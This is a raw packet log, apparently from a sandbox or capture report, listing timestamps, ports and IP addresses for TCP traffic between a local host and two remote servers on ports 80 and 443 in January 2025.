Jan 14, 2025 08:08:12.475938082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.475950003 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.475991011 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476023912 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476037979 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.476057053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476089001 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476105928 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.476119995 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476166964 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.476170063 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.517889023 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527404070 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527456999 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527491093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527523041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527573109 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527606010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527637959 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527663946 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527663946 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527663946 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527694941 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527740002 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527745962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527779102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527811050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527842999 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527892113 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527923107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527954102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.527975082 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527975082 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527975082 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.527986050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528036118 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528045893 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528069973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528103113 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528119087 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528135061 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528188944 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528239012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528275013 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528306007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528325081 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528337955 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528369904 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528384924 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528403044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528451920 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528453112 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528484106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528517008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528542042 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528548002 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528580904 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528594971 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528614044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528645992 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528661013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528678894 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528713942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528728962 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528747082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528779984 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528793097 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528811932 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528845072 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528856993 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528877020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528908968 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528932095 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.528939962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528973103 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.528985023 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.529006004 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529037952 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529055119 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.529069901 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529102087 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529119015 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.529130936 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529162884 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529176950 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.529197931 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529226065 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.529251099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564378977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564501047 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564558029 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564604998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564654112 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564686060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564717054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564764023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564789057 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564790010 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564811945 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564843893 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564857960 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564877033 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564907074 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564913988 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.564955950 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.564990044 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565043926 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565078020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565095901 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565109015 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565141916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565160990 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565171957 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565207005 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565223932 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565237999 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565270901 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565284967 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565304041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565335989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565350056 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565380096 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565412998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565427065 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565464973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565498114 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565519094 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565530062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565579891 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565582037 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565614939 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565661907 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565668106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565720081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565768003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565794945 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565815926 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565864086 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565865040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565898895 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565931082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565948009 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.565962076 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.565999985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566009998 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566031933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566076994 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566117048 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566148043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566179991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566191912 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566211939 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566260099 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566261053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566293955 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566324949 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566339970 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566355944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566389084 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566401958 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566420078 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566452026 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566466093 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566483974 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566519022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566538095 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566550016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566582918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566597939 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566613913 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566646099 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566658974 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566678047 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566709995 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566723108 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566740990 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566773891 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566787004 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566806078 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566838026 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566850901 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566869974 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566901922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566927910 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566932917 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566965103 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.566978931 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.566998005 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.567029953 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.567044020 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.571609020 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618033886 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618057966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618072987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618087053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618100882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618115902 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618129969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618144035 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618159056 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618171930 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618185997 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618200064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618259907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618261099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618262053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618262053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618262053 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618283033 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618305922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618319988 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618335962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618344069 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618350029 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618366003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618371010 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618380070 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618393898 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618395090 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618412018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618426085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618441105 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618458986 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618458986 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618490934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618511915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618534088 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618547916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618562937 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618585110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618598938 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618613005 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618637085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618649960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618664980 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618678093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618694067 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618709087 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618707895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618707895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618707895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618707895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618782043 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618794918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618818045 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618833065 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618861914 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.618973970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.618988991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619003057 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619016886 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619023085 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.619034052 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619044065 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.619051933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619066954 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.619067907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619085073 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619101048 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619110107 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.619113922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.619148970 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.619167089 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655086994 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655137062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655169010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655216932 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655250072 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655297041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655338049 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655338049 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655364990 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655395985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655462980 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655494928 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655528069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655555964 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655561924 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655556917 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655595064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655626059 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655627012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655627012 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655663967 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655697107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655729055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655760050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655791998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655824900 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:12.655874014 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655874014 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655874014 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:12.655874014 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:13.243884087 CET	49740	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.243923903 CET	443	49740	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:13.244050026 CET	49740	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.244432926 CET	49740	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.244525909 CET	443	49740	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:13.244976997 CET	49740	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.277254105 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.277276993 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:13.277424097 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.278747082 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:13.278758049 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.579528093 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.579595089 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:14.583584070 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:14.583592892 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.584014893 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.625478029 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:14.638745070 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:14.683326006 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.953985929 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.954047918 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.954067945 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.954121113 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:14.954138041 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:14.954159021 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.006422997 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.170934916 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.170950890 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.170980930 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.171042919 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.171119928 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.171302080 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.171319962 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.171374083 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.172739029 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.172748089 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.172815084 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.173615932 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.173624039 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.173681974 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.388896942 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.388922930 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.388972998 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.389019966 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.389511108 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.389578104 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.389985085 CET	443	49742	166.62.27.188	192.168.2.4
